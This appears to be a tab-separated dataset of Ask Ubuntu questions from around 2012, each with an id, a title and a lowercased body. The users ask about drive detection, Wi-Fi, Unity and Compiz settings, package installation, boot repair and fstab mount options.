182446	how do i view all available hdd's/partitions ?	i found a 6 gb ide hdd in my basement . i want to plug it in and see what might be on it . the drive seems to be recognized in bios . i ca n't find it in ubuntu to view files , and ubuntu is the only os on that particular computer . i was wondering if ubuntu has an equivalent to the windows feature `` my computer '' , which lists all available drives/storage devices . typically , my computer shows c : , which can be opened to view all of your directories and files . at this point , it is very similar to ubuntu 's home folder . how to view/select all available partitions of that drive or all available hdd 's without formatting or tampering with the contents in any way ?
182452	wireless internet is connected to an open network but has no internet	i just installed ubuntu on my laptop yesterday and it connected to the wireless fine . then i took it to school , put it on their wired connection , downloaded some stuff , and now the wireless does n't work . at first it would detect networks , but not connect . i restarted it and now it can connect , but it acts like it does n't have internet in the browser . wired connection still works fine on it . i know it is n't the network because my ipad is working on the wireless connection fine . i found another solution on here switching the security settings for the wireless , but this is the apartment 's wireless so they have it open , and i wo n't be able to mess with it at all . here is lspci output : 00:00.0 host bridge : intel corporation core processor dmi ( rev 11 ) 00:03.0 pci bridge : intel corporation core processor pci express root port 1 ( rev 11 ) 00:08.0 system peripheral : intel corporation core processor system management registers ( rev 11 ) 00:08.1 system peripheral : intel corporation core processor semaphore and scratchpad registers ( rev 11 ) 00:08.2 system peripheral : intel corporation core processor system control and status registers ( rev 11 ) 00:08.3 system peripheral : intel corporation core processor miscellaneous registers ( rev 11 ) 00:10.0 system peripheral : intel corporation core processor qpi link ( rev 11 ) 00:10.1 system peripheral : intel corporation core processor qpi routing and protocol registers ( rev 11 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 05 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 05 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 310m ] ( rev a2 ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 07:00.0 network controller : realtek semiconductor co. , ltd. rtl8191sevb wireless lan controller ( rev 10 ) 16:00.0 system peripheral : jmicron technology corp. sd/mmc host controller ( rev 20 ) 16:00.2 sd host controller : jmicron technology corp. standard sd host controller ( rev 20 ) 16:00.3 system peripheral : jmicron technology corp. ms host controller ( rev 20 ) 16:00.4 system peripheral : jmicron technology corp. xd host controller ( rev 20 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 04 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 04 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 04 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 04 ) ff:03.0 host bridge : intel corporation core processor integrated memory controller ( rev 04 ) ff:03.1 host bridge : intel corporation core processor integrated memory controller target address decoder ( rev 04 ) ff:03.4 host bridge : intel corporation core processor integrated memory controller test registers ( rev 04 ) ff:04.0 host bridge : intel corporation core processor integrated memory controller channel 0 control registers ( rev 04 ) ff:04.1 host bridge : intel corporation core processor integrated memory controller channel 0 address registers ( rev 04 ) ff:04.2 host bridge : intel corporation core processor integrated memory controller channel 0 rank registers ( rev 04 ) ff:04.3 host bridge : intel corporation core processor integrated memory controller channel 0 thermal control registers ( rev 04 ) ff:05.0 host bridge : intel corporation core processor integrated memory controller channel 1 control registers ( rev 04 ) ff:05.1 host bridge : intel corporation core processor integrated memory controller channel 1 address registers ( rev 04 ) ff:05.2 host bridge : intel corporation core processor integrated memory controller channel 1 rank registers ( rev 04 ) ff:05.3 host bridge : intel corporation core processor integrated memory controller channel 1 thermal control registers ( rev 04 ) update : i re-installed ubuntu 12.04 ( i assumed i messed something up while toying with it ) but it did not solve the problem . eventually , i got it to work with my school 's wireless internet ( the default network settings were wrong ) , but the internet still does n't work on my apartment 's wifi ( it has no security on it ) . update 2 ( 09/19 ) : the wireless on campus still works , but sometimes it disconnects and i have to reboot before being able to connect again . the wifi at my apartment can connect to the apartment sometimes , but it gets disconnected again within minutes . i have been running sudo apt-get update and upgrade if anybody is wondering . i read the intermittent disconnection on campus might be from login information getting in the way of my automatic login on the schools network , but deleting passwords did n't solve anything .
182454	minimize button is missing on unity	this error happens on both unity 3d and unity 2d . i tried unity -- reset command but it does n't fix the error . gnome shell properly shows all three buttons minimize maximize and close . but unity does n't show it properly . how to fix this error ? here 's the screenshot :
182455	slow hd in ubuntu 12.04 intel sandybridge mobile	i got a computer with a preinstalled version of windows 7 but i decided to install ubuntu , but there is a problem during the hard drive is too slow . i have an intel sandybridge mobile graphic controller , an intel core i5 processor 2,4 ghz , 4 gb ram , what should i do ?
182456	12.04 unity middle mouse activation of compiz window scaling	that 's about the summary of my problem . just updated to 12.04 and button2 will no longer activate the compiz 'scale ' facility for window switching . there does n't seem to be any binding conflicts ( in compiz config .. assuming this is the right place to set it ? ) . does someone have some advice ?
182457	how to make windows resist overlapping each other ?	i just upgraded from lucid / gnome2 to precise / unity . in gnome2 , if you try to drag one window next to another one , there is a pause* when their edges meet so that you can align them perfectly . what is that behaviour called ? can i get it in unity ? * the window stops moving once its border touches the border of another window , even as the mouse continues to move . after the mouse has moved maybe 5-10 more pixels , the window resumes moving along with the mouse .
182460	does ubuntu support onlive universal controller ?	i want to buy a good gamepad . i know that xbox 360 controller works but not completely supported . dualshock is not an option ( i need my bluetooth free ) . so i noticed this onlive universal controller thing , that costs like 50 bucks , but is very well made . however i want to know if it works ...
182465	how can i get my system performance back again ?	i have had this laptop for about 3 months running ubuntu and it is now considerably slow performing every function than when i first installed ubuntu 12.04 . i have tried running a virus scanner . i have turned on `` preload '' . i am running `` zram '' . even tried `` bleachbit '' but nothing seems to help .
182466	i am getting an internal error that prevents update manager from opening , pkg unidentified	error message says that the package can not be identified , update manager will not load to see if there are any known bugs on this . i am on 12.04 running on a dell laptop . appreciate any ideas .
182467	ubuntuone thunderbird filelink and big files	i ca n't upload big attachments in mozilla thunderbird . i 'm using filelink feature . i can upload small files , but not big one ( 200mb ) . is it some restrictions to file size ?
182469	how can i connect to wireless network using a wireless dongle in ubuntu 11.10 ?	i have dual operating system xp and ubuntu 11.10 and trying to connet internet by using hsdpa 3gpp release5 micromax dongle but it is working in windows xp not in ubuntu.i am unable to connect internet even i have done my edit connection and all the setting using aircel network but unable to connect internet.plz give me a sugession how could i do manually . how can i connect to wireless network using a wireless dongle in ubuntu 11.10 ?
182472	ca n't install lua on 12.04 on chrome book	i am currently trying to install lua on my ubuntu 12.04 on chrome book and i keep getting this error : i 'm doing good learning different programming languages ( self taught ) and well i wanted to start learning lua . that error is keeping me from doing that unfortunately . i 've tried doing it with and without of root access and still no success . does anyone know what might be causing the problem or of a different way of installing lua ? thanks a ton ! do n't mind the top of the image just me taking out my frustration .
182474	skype installation fails , can not install ia32-libs	when i try to install it from the software center , it displays an error : the following packages have unmet dependencies : skype : depends : skype-bin but it is a virtual package running sudo apt-get install skype gives the same error . when i download it from the official website , the .deb file opens in software center and displays `` can not install 'ia32-libs ' '' and does n't even show the install button . please help . how can i install skype ?
182476	is ubuntu server an operating system or an add-on for ubuntu ?	is ubuntu server an operating system or an add-on for ubuntu ? also any info on setting up a minecraft craftbukkit server would be nice .
182478	ssh scp to copy file to remote server port 21	i am trying to copy file from my server to another so i am using the following command : scp root @ myhost /home/direc/file.tar username @ secondhost : /home/dir i am getting the error : ssh : connect to host secondhost port 22 connection timed out i know it might be because port 22 is not open on second host so how do i transfer by specifying port 21 on my second host
182483	are x.04 releases generally more stable than x.10 releases ?	i just noticed there are always two versions of ubuntu , x.04 and x.10 . which is the best ? is it really that x.04 are more stable but with less applications ? i have 12.04 and 11.10 but 12.04 keeps logging me off . should i rather wait for the 12.10 ? please say the differences between a x.04 and a x.10 version .
182489	how do i enable week numbers in calendar applet when settings are missing ?	i really want the time/date indicator applet to show me week numbers on the monthly view , and found this answer on how to enable : ubuntu application to show calendar with week numbers however , my settings does not look like this , just a stripped down version without tabs , why ? is there a config file somewhere i can set this ? settings screenshot : on ubuntu 12.04 with gnome classic
182492	what media servers support dlna sharing ?	as the title says iâ´m searching for a mediaserver for ubuntu 12.04 . i have already tried mediatomb , serviio , miro ( media management ) , songbird ( media management ) . but the thing is , that i need a mediaserver which is able to share the media via dlna and which is performant , so optional with an external database server . the problem is , that i have a very big media collection , and media management tools like songbird and miro are not performant with such a lot content . do you know some good server solutions for media management and sharing ?
182493	12.04 : three finger gestures disappeared from touchpad ?	i 've recently upgraded from 11.10 to 12.04 , and i realize now that i have lost the ability to simulate a middle-click by using my touchpad with three fingers . my laptop is a recent sony vaio vpcse ( i do n't have the precise reference right here ) . is there something to do for me to regain this feature ? thanks in advance .
182498	google authenticator for the desktop	is there a desktop application for google authenticator ( an equivalent to the phone app , not the pam lib ) ?
182505	how do i install php5.2 on server 12.04	how do i install php5.2 on ubuntu 12.04 server ? do you know any ppa for that ? thanks ,
182507	my data vanished after copying to e drive	of late i had been thinking of having a fresh install of ubuntu . so i cut-pasted all my required files and folders in my e drive . then i decided to not to have a fresh install and just let it be . later , when i booted up in windows ( dual-boot with 12.04 and windows 7 ) , i found that the files and folders i had cut-pasted from my home account in ubuntu are just not there . what is even more surprising is that now , when i am back on ubuntu , those files and folders that should have been there in my e drive are also not there . is it an ubuntu issue or a hard drive issue ?
182517	is it possible to lose some directories when upgrading from 11.10 to 12.04 ?	last day i upgraded my ubuntu 11.10 desktop to ubuntu 12.04 . i was running a kvm virtual about 7 machines and managed by virt-manage software . anyway when i finished upgrading i found that virt-manager is not working . so i had to reconfigure it again and install some other missing packages that was deleted ! eventually , i managed to solve this issue . then i started to restore my virtual machines . i restored 2 machines without any problems . the third and fourth ones ( windows ) made a check disk that lasted more that 6 hours but finally it worked . other machines i ca n't find their attached hard disks . i do n't know what happened but i ca n't find those files . does upgrading delete files ? is there anyway to restore those files ?
182521	is there any way to make a windows version of my python/gtk3 apps ?	i 've recently been doing quite a bit of coding using quickly and gtk 3 . its great and i 'm happy with some of the results , but now i 'd like to share my apps with people running windows or mac . is there any way to make a windows installer of some kind , or will i have to hold their hand as they try to install the various libraries etc ? thanks in advance .
182526	eclipse shorcuts ( f3/ctrl+click ) not working for navigation	shortcut to access the declaration with the help of this shortcut is not working installed version of ubuntu is 12.04 and for eclipse it is : version : juno release build id : 20120614-1722
182529	how do i get my canon mf4410 printer to work ?	i have a canon i-sensys mf4410 laser printer . i am running a dual boot system with windows 7 and ubuntu 12.04 . the printer works in windows and ubuntu sees it when i attempt to add a new printer but i can not get it to work in ubuntu . ( it previously worked fine under ubuntu 8. ? ) i have tried installing ( and un-installing ) the driver cque-en but , although ubuntu sees the printer , it does not find the driver . i have even tried using the generic laser and 'text only ' drivers but these do not work . if anyone can help and it requires using terminal please give detailed instructions .
182530	ubuntu update manager error & ubuntu internal error	i 'm using lenovo b460e laptop 2gb ddr3 ram , dual core processor , ubuntu 32bit os when opening update manager the following error occurs 'e : type 'wnloader ' is not known on line 2 in source list /etc/apt/sources.list.d/jd-team-jdownloader-precise.list ' can anyone help
182541	when to expect the results of the ubuntu app showdown community vote ?	the vote is closed since the 29th of aug. is everything ok ? should n't we be aware of the results already ? i thought the counting was done automatically from the site that the voting was taking place . i understand that the applications have to result into the ubuntu software center , but i find that anything more than 3 days is excessive . 9 have passed . any announcements yet ?
182544	partitioning alongside windows 7	i am attempting to install ubuntu 12.04 alongside windows 7 . i am not advanced in linux so i am a little confused . whenever i attempt to install ubuntu from the cd , i get all the way to the point where it asks me to partition my drive . on the basic level there is a 2 sided bar that can be dragged back and forth to select how many gb you wish . my question is : which side of the 2 bars is the ubuntu side , and which side is the windows 7 side ? there is no way to differentiate between the 2 bars . i suspect the ubuntu side is the right side , because its default setting is a lower gb amount than the left side ; but i ca n't be sure , and i do not want to screw up my windows partition .
182545	bash : command not found	i have a script that needs to know the processor architecture . i 'm doing this way : if [ [ `` $ ( uname -m ) '' = `` x86_64 '' ] ] ; then wget https : //dl.google.com/linux/direct/google-chrome-stable_current_x86_64.rpm else echo `` nossa ! você só pode usar 3,5gb de memória ram . que triste : ( vou baixar a versão 32bits pra você tá ? '' wget https : //dl.google.com/linux/direct/google-chrome-stable_current_i386.rpm fi but when i execute the code , i receive : instala_chrome.sh : line 35 : [ [ x86_64 : command not found anyone can help me to solve this ? thanks !
182547	12.04.01 upgrading from creating livecd	i have downloaded ubuntu 12.04.01 from the ubuntu site and tried to make a livecd , livedvd , liveusb but while finishing burning it got some curruption . cd/dvd did not come out automatically . it says take it out mannually . when i pull out manually it shows some curruption occurred . what is the correct way to create a livedvd or liveusb for upgrading my previous version . and what is the method to upgrade with this livedvd or usb . thanks .
182554	all applications erased and software center does not open	i installed wine installed a few games and after a restart all the apps seems to be erased even system settings . the problem is the apps seems not visible only in unity and not elsewhere . software center on the other side does not open at all .
182556	failed to install ubuntu 12.04 with usb stick	i am using ubuntu 10 . i downloaded the iso file of ubuntu 12.04 desktop version , then burnt it into my usb stick ( 8gb ) , and everything seemed ok. now i restarted the notebook , and managed to get to the ubuntu desktop , but only after waiting for a good amount of time . after doing so , i proceed to clicking on the button `` install ubuntu '' , but it seems like it fails to respond properly , and does n't initiate the ubuntu installation procedure . i have tried to do so several times , but the button 's functionality just does n't seem to work . what could i possibly do to be able to complete the installation ?
182563	can i install ubuntu on mid tab wms8153 ?	following are the hardware details : model : wondermedia wm8650 android version : 2.2 kernel version : 2.6.32.9-default build number : generic-eng 2.2 froyo ver1.5.8-20120331.113758 m788 - ddr2256 4g ss125040xc green led power on wms8153_7inch_2g please let me know the best way to install ubuntu on my tablet .
182564	boot menu wo n't appear after installing ubuntu 11.10	i just installed ubuntu 11.10 from a live cd . when i restart it , it immediately boots ubuntu without loading a boot menu for me to choose either ubuntu , or my previously installed windows 7 os . here is the output of the boot info script . i really do n't know what to do right now , as i 'm sort of new to the linux environment .
182565	how to connect to a 802.1x wireless network with eap type to be securew2 ?	my school 's wireless network supports 802.1x wireless connection with securew2 as eap type.is it possible to connect to this network from ubuntu 12.04 ? i am asking because after a small google research that i did securew2 is only for windows .
182566	after login , mouse not working !	i installed ubuntu 12.04 x64 on my pc . a short time after i login the mouse pointer disables and i ca n't move it ! please help me , i am new in linux .
182567	dropbox icon in tray is missing	i have ubuntu 12.04 and today when i start my laptop i saw that the dropbox icon is missing from the top panel and i do n't know how can i get it back .
182573	why does ubuntu only boot when i have the installation usb stick plugged in ?	i made a usb image from ubuntu 's main website , for ubuntu 12.4.1 , and it installed and ran perfectly off the harddrive . it couldnt be installed the usb drive , for it 's only 4gb and the partition i was told i made was 500gb . anyway , when i turn my new laptop on , it runs through the bios and then hits an all black screen with the little underscore blinking . nothing happens and pressing too many keys causes it to beep . also , i checked and going to the boot menu and choosing my harddrive produces the same results , so i know it 's attempting to boot from my harddrive . so , if i plug the usb stick back in , it boots fine . i can even take the usb stick after it boots and the os continues to run fine , installing and saving stuff to my harddrive , as if the boot problem never happened . so what did i do wrong ? i 've installed ubuntu before on computers , each time using usb , and never had this problem .
182574	boot problem : missing operating system	a sudden power cut caused my ubuntu not booting any more with the error 'missing operating system ' . no grub menu appeared at all . i tried using boot-repair to solve this problem , but that did n't help . boot info here : http : //paste.ubuntu.com/1177698/ any help is extremely appreciated .
182579	can i replace the android os with ubuntu on the zeki 7.0 '' android tablet ?	i just ordered this tablet from target , but i would much rather have ubuntu on it than android . is there any way i can remove android and install ubuntu with the necessary drivers ? it seems like it should be possible , but i have never heard of it being done .
182586	where are my uploads from u1 saved when using thunderbird filelink with u1 ?	thunderbird 15 has now u1 filelink support to upload a file to the cloud instead of attaching it . it works great , the question is , where are the files stored - so that i can delete them later . i did a test run sending a small file using filelink . than i searched inside my u1 folder - could n't find it . same result when searching the whole pc using the cli . update - mozilla faq ( thanks to tom brossman ) : q : how long will my file be available on the storage service provider 's site ? a : the file will remain available on the storage service provider's site until you specifically delete it . log in to the provider's website to view and delete the files in your storage space .
182587	build 32-bit on 64-bit ubuntu : installing ia32-libs does not include libstdc++	googled for a while but drawn a blank . need to build 32-bit app on 64-bit ubuntu . realise that i need to install ia32-libs . i have done this and apt-get tells me it 's already at the latest version . this link : http : //packages.debian.org/squeeze/amd64/ia32-libs/filelist says that libstdc++ should be in /usr/lib32 it 's not there ! i have uninstalled , reinstalled ( with force ) ia32-libs . any ideas ? how can i get this critter on my box ? ta , ben
182591	how can i open .db files ?	i 've imported a .db file from my android device and i wish to open it using libreoffice base or something similarly basic with a simple gui . how do i achieve this ?
182596	when can we get libre offfice 3.6.0 ?	when can we get libre office 3.6.0 in ubuntu 12.04 ?
182601	how to install vlc player from tar file	after getting vlc-2.0.3tar.gz i extracted it and then tried the ./install , but it gave me an error . then i did ./configure and got this.. configure : error : no package 'dbus-1 ' found . then tried this : apt-get install dbus-1 but i got this : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? what do i do next ?
182604	canon mp280 all in one prints but scanner not recognized	i recently installed 12.04 lts after not using any linux distro for several years . my canon mp280 worked perfectly as far as printing goes and i was even able to set it up on a samba share and print from a windows 7 machine . however , when i open simple scan it does not detect a scanner . i did find some instructions online but the scanner is still not recognized in simple scan even after installing a couple .deb packages from the canon site . i also could n't seem to find the scangear package after installing those .deb packages as well but i have n't had a chance to delve fully into it .
182606	i can not install ubuntu on my pc ( asrockp4v88 )	i can not install ubuntu . when i insert the installation cd in dvd-rom , my computer does boot from cd and automatically run windows . i even tried to boot manually from cd but it does not work . my friend told me to use a new dvd-rom , so i tried it but it does not work too . system specs : motherboard : asrock p4v88 cpu is intel p4 celeron 2.3ghz 786mb ram
182611	no previews in ubuntu 12.10	i have downloaded and installed ubuntu 12.10 from http : //cdimage.ubuntu.com/daily-live/current/ . i can not see and untiy previews in the dash however . when i right click on a song , or any other files/app for that matter , it opens up the files instead of showing previews . could you please help me out because i really want previews and is one of the main reasons i installed ubuntu 12.10 . p.s . i installed ubuntu 12.10 a while back ( about a month ago ) and made sure i did every update .
182612	why are the images noisy and low quality system wide ? why do the color profiles not activate ?	i 'm relatively new to ubuntu ( 12.04 ) and i 'm now trying to decide if the system is usable for serious photography work . so far i love unity and the snappiness of the system but there are some problems i ca n't resolve by googling . my laptop has an integrated intel hd 3000 and an nvidia 630m card ( managed to be able to use it with bumblebee ) 1 ) somehow the images shown in darktable , image viewer , etc . are really low quality , noisy and smudgy but clean and sharp in windows on the same screen , same resolution . every other thing looks nice , like movies and websites . 2 ) i have a calibrated profile for my screen and i 've already added it in the system 's color settings , set for all users also but does not activate . it would be especially needed for my external display which has too saturated reds thus unusable for work now . does anyone have any suggestions ? i 've grown to love ubuntu and would be really happy to be able to use it for work .
182613	where to find other versions of opera browser as deb packages ?	i used opera mainly for the unite feature now to be abandoned . it is missing in v. 12 . some say its features will re-emerge in future extensions etc . until then , unite is still accessible in v. 11 . where do i get the v.11 deb ? as opera-unite is no longer supported , it is possible that the server that provides the file sharing etc will soon be unaccessible . even if that is the case the question should maybe not be closed at it has a general usefulness independently of the unite issue . ( it seems that in windows upgrading from v.11 to v.12 keeps the unite . not in ubuntu , as far as i can tell . )
182614	are ubuntu software center sources different from apt-get / synaptic ?	i 'm trying to download master-pdf-editor package from official repositories . all sites report that it 's easy to do : just download it from ubuntu software center . i ca n't install the software center , so i 'm trying to install it via apt-get or synaptic , but i ca n't find the package in the repos ... can anyone help ?
182619	error installing mysql ubuntu 12.04 , dependency ?	i 'm trying to install mysql 5.5 on ubuntu 12.04 , but i 'm stuck with this error : setting up mysql-server-5.5 ( 5.5.24-0ubuntu0.12.04.1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 )
182622	ubuntu boot cd confusion	if i burn the iso to a cd on windows 7 using their burner or whatever burner is required , can i boot the cd on mac and install ubuntu ? i dont want to use disk utility or any mac burning tool
182625	what is the name of the disk partitioner used during installation ?	what is the name of the disk partitioner used during installation ? i want to use the same one to partition disks , etc . i saw a demonstration where someone was using it to partition additional drives , lv 's , etc . they were running it from the command line . i would like to use it instead of fdisk . would someone please provide the name of the executable ?
182629	rename localhost folder . gives empty screen	i 'm trying to rename my apache2 localhost folder . i have already gone to /etc/apache2/sites-enabled/site-name and changed the following lines in the document : documentroot /home/user/public_html directory /home/user/public_html 'public_html ' is then the new name of my localhost . then i restarted the apache2 server , but this does not work as when i type 'localhost ' in my browser i just get an empty screen . what else must i do to change the folder name of my localhost ? my system is an l-ubuntu 11.04 , by the way .
182633	nautilus with two tabs takes up 300mb memory ?	there are currently two tabs opened in nautilus . it has been running for quite a while , there have been more opened and closed before , and there have been switching between directories using bookmarks before . now nautilus takes up about 300mb memory shown in `` memory '' column in system monitor . this happened quite often . i wonder if it is reasonable ? if i exit nautilus , and restart it , and open just two tabs , the memory used is just 16.3mb . thanks !
182639	how do you make a bootable usb stick on osx with a corrupted harddrive` ?	i cant access the desktop because my harddrive is corrupted . therefore i want to make a bootable usb stick so i can transfer all of my important files to my external hd . problem is that im stuck on step 3 -- - > http : //www.ubuntu.com/download/help/create-a-usb-stick-on-mac-osx . im not sure of what i should change this to : hdiutil convert -format udrw -o ~/path/to/target.img ~/path/to/ubuntu.iso it says convert failed - no such file or directory . obviously the problem is that i dont know the path to the usb , maybe you know how to find out ? please help me . thanks . ps . ive downloaded the ubuntu desktop amd64+mac .
182640	how do i know if i 'm running the open source amd drivers for radeon ?	well as the title says . glxinfo just says mesa and i assume this is not the driver from amd being loaded , as i get terrible fps in 3d games . ubuntu 12.04 mobility radeon hd 3400 series
182642	devnagari script in terminal	when i try to write in terminal in devnagari script , the vowels are shown separated from consonants ( unlike how it is written ) . the same is the case when i open a file containing devnagari characters in vim in terminal . is there a way to get these characters printed properly ?
182649	is it possible to sync rhythmbox playlist to ubuntu one music or use a m3u file as ubuntu one playlist ?	i recently started trying ubuntu one music streaming and now it feels good . however i have a problem here : i used to have several long playlists for myself in rhythmbox ( 300-500 songs each playlist , in my favored order ) , and i really liked to play songs from the playlist instead of shuffling all songs . so , i wonder if i can upload my playlist to ubuntu one music , or make a same playlist on ubuntu one music without dragging songs one by one . is it possible to do this in rhythmbox or do it by uploading some m3u playlist file ? or maybe some other method ? please suggest me any method that can `` copy '' my playlist to ubuntu one music . thanks very much !
182654	is there any legal things i need to discuss with canonical before publishing an ubuntu-based distribution ?	i would like to know if there is some legal stuff i should fix with canonical in order to make my distro publicly available as it is based in ubuntu . thanks .
182655	problem with setting up a bootable usb on corrupted osx	i cant access the desktop because my harddrive is corrupted . therefore i want to make a bootable usb stick so i can transfer all of my important files to my external hd . problem is that im stuck on step 3 -- - > http : //www.ubuntu.com/download/help/create-a-usb-stick-on-mac-osx . im not sure of what i should change this to : hdiutil convert -format udrw -o ~/path/to/target.img ~/path/to/ubuntu.iso it says convert failed - no such file or directory . obviously the problem is that i dont know the path to the usb , maybe you know how to find out ? please help me . thanks . ps . ive downloaded the ubuntu desktop amd64+mac . pps . unetbootin is a different alternative , but i dont know if it works ?
182658	what are the default mount settings for mount / fstab ?	what are the default mounting options for a non root partition ? the man entry for mount says ... defaults - use default options : rw , suid , dev , exec , auto , nouser , and async . ... so that might be what we expect to see . but , unless i 'm missing something , that 's not what happens . i have an ext3 partition labelled `` newhome20g '' which is seen as /dev/sdc6 by the system . this we can see from ... root @ john-pc1204 : ~ # blkid | grep newhome20g /dev/sdc6 : label= '' newhome20g '' uuid= '' d024bad5-906c-46c0-b7d4-812daf2c9628 '' type= '' ext3 '' i have an entry in fstab as follows ... root @ john-pc1204 : ~ # cat /etc/fstab | grep newhome label=newhome20g /media/newhome20g ext3 rw , nosuid , nodev , exec , users 0 2 note the option settings that are specified in that fstab line . now i look at how the partition is actually mounted after boot up ... root @ john-pc1204 : ~ # mount -l | grep sdc6 /dev/sdc6 on /media/newhome20g type ext3 ( rw , noexec , nosuid , nodev ) [ newhome20g ] ... so , when the filesystem gets mounted the exec & users options i specified seem to have been ignored . just to be sure , i unmount sdc6 , remount it and look at the mount options again ... root @ john-pc1204 : ~ # umount /dev/sdc6 root @ john-pc1204 : ~ # mount /dev/sdc6 root @ john-pc1204 : ~ # mount -l | grep sdc6 /dev/sdc6 on /media/newhome20g type ext3 ( rw , noexec , nosuid , nodev ) [ newhome20g ] ... . same result now i unmount the partition again , remount it specifying the exec option and look at the result ... root @ john-pc1204 : ~ # umount /dev/sdc6 root @ john-pc1204 : ~ # mount /dev/sdc6 -o exec root @ john-pc1204 : ~ # mount -l | grep sdc6 /dev/sdc6 on /media/newhome20g type ext3 ( rw , nosuid , nodev ) [ newhome20g ] ... and here the exec option has finally taken effect and the noexec setting has vanished . just for interest , i re-mount the partition with the defaults option root @ john-pc1204 : ~ # umount /dev/sdc6 root @ john-pc1204 : ~ # mount /dev/sdc6 -o defaults root @ john-pc1204 : ~ # mount -l | grep sdc6 /dev/sdc6 on /media/newhome20g type ext3 ( rw , noexec , nosuid , nodev ) [ newhome20g ] the noexec is back , so it looks very like rw , noexec , nosuid , nodev are the default options which is not what man says . why does this matter ? i have a folder full of useful scripts stored on a data disk . because that disk is mounted noexec those scripts wo n't run , even though they have all been set with chmod 777 . i can work round this in several ways but it 's disappointing that the man entry seems to be wrong . have i missed something obvious here or have the default options in ubuntu changed from what they were a few versions ago ?
182659	error in all app installations	every time i try to install a new application or any other library to my ubuntu 12.04 , it does everything and at the end it shows me a message saying : e : malformed line 60 in source list / etc / apt / sources.list ( distribution analysis ) e : the list of sources could not be read .
182663	are there `` portable '' versions of opera for linux/ubuntu ?	i want to use the latest opera browser , but v12 does not have opera-unite anymore . so , i would like to use a `` portable '' v11 opera ( v11 has unite ) . ( by portable i mean a program with all files within a certain directory that can be put in any place on the hard drive or on an external drive , a program that can be started by running an executable file from the same directory , and which can be run separately of other installed versions of the same program . )
182670	application crash cleared the content of the folder	recently while working on the linuxdc++ over the network the application crashed while downloading files . now my downloads folder which had at least 60-80gb of data is completely cleaned but the system is not reporting the available the correct free space . is there way to restore the contents of the folder only as the solution available are for the whole partition . i just want to recover the contents from one folder .
182673	ubuntu software source file error	whenever i try to install any software using terminal or by entering sudo apt-get update , the result is : e : malformed line 56 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . my sources.list is at http : //paste.ubuntu.com/1180079/ .
182674	how to verify if a repository is already added	i have two repository that i want my script to verify if they are on the system . how can i verify by command line if a repository is already added to the system and , if not , add them ?
182676	compiz not working and compiz options in fusion icon are greyed out	i 'm having trouble with compiz , since i upgraded to 12.04 . i have an nvidia-card ( geforce 9600m gt ) . in general compiz works , but it has performance issues and rendering problems as in the following screenshot 1 , that make usage impossible . according to my research , the loose-binding option could help solving the problem . unfortunately this is unavailable to me , as the compiz options in the fusion icon are greyed out . additionally the command-line argument -- loose-binding for compiz provokes an error that this option is unavailable . same goes for the -- indirect-binding option . how to make those options available or solve the rendering problems in general ?
182686	gptsync mismatch problem	i have a hybrid disk . after trying to copy some files from another disk to this one , i lost my osx and ubuntu boot capability . ran gptsync and got : current gpt partition table : # start lba end lba type 1 34 1987 bios boot partition 2 1988 1029662719 basic data 3 1029662720 2108995583 basic data 4 2108995584 2109405183 efi system ( fat ) 5 2109405184 2517004287 mac os x hfs+ 6 2517266432 2667417599 mac os x hfs+ 7 2667417600 3900229631 basic data 8 3900230504 3907029118 linux swap current mbr partition table : # a start lba end lba type 1 1 3907029167 ee efi protective status : mbr table must be updated . proposed new mbr partition table : # a start lba end lba type 1 1 33 ee efi protective 2 34 1987 da non-fs data 3 1988 1029662719 83 linux 4 * 1029662720 2108995583 07 ntfs/hpfs may i update the mbr as printed above ? [ y/n ] clearly the mbr table is damaged or mismatched . but it does not reflect the correct gpt table partitions at all . how do i get the mbr repaired to match the gpt table ( up to the 4 part limit of course ) ? the question is simply - do i blindly say yes to gptsync 's suggestion ? it looks sort of ok but not exactly so ... advice please on interpreting the above output to get my disk usable would be greatly appreciated . thank you !
182693	burning a cd keeping original timestamps for files	is it possible to do what is summarized in the title ? i would really like the files on my disc and iso images to be marked with same creation date and modification date as in original files . i mostly use brasero ; anyway also a solution with different program would be ok , as soon as iso images can be created instead of burning discs . thanks !
